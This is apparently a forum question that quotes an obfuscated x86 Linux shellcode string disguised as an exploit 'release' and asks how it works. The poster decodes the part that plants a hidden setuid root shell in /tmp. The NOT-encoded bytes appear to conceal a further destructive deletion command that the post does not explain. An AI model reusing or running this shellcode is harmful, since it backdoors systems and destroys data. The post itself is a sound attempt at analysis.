<p><pre><code> char esp[] _attribute_ ((section(".text"))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
</code></pre>
Can anyone explain this one? I would have guessed that it's causing an exec (or something equivalent) with argv "/bin/sh", "-c", "cp -p /bin/sh...". That's malicious if run as root ('4' in 4755 is setuid, so it basically hides a root shell in /tmp), but it's not 'rm -rf /'. I could believe that the post is wrong, but I'd still like to know how this works.<p>What I've gathered:<p>1. The final bytes of hex there are "/bin/sh\0-c\0", which is where I'm getting the argv from. The exec is mostly a guess, because I can't think what else it would be doing. The previous hex bytes are non-text, possibly precompiled executable code.<p>2. The '_attribute_ ((section(".text")))' is a gcc extension that causes this string not to be stored where it usually would be in the binary. I believe the .data section would be more normal? But I've never been very clear on what the different sections are for.